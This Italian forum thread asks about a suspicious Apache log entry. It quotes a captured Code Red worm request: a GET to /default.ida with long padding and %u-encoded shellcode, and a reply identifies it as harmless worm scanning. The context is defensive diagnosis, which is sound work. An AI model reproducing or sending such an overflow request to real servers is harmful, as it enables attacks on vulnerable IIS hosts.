Qualcuno entra in apache?

[akiross]

Hola gente!
Per la prima volta, guardando i registri di apache, ho il presentimento che qualcuno abbia tentato di superare la barriera APACHE.

Nel log vedo cose tipo:
213.104.100.16 - - [09/Jun/2003:04:17:32 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%uc bd3%u
7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u78 01%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff %u0078%u0000%u00=a HTTP/1.0" 404 269 "-" "-"

ripetute qualche migliaio di volte...

ho come il presentimento che questi tizi abbiano intenzione di generare un errore di overflow o cose cosi'...

e ho anche l'impressione che sia una tecnica troppo banale, troppo conosciuta.

Qualcuno mi dice di piu'?

Grazie
ciao

[Al è qui]

In linea di massima dovrebbe essere un Code Red che scanna la rete.
Credo che tu possa stare tranquillo. Dico questo perchè ho visto la richiesta GET /default.ida e HTTP/1.0" 404, classici segni del worm.

Ricorda sempre che se è un server di lavoro devi far controllare tutto il log non solo un pezzo, e controllarlo con attenzione su tutti i servizi attivi.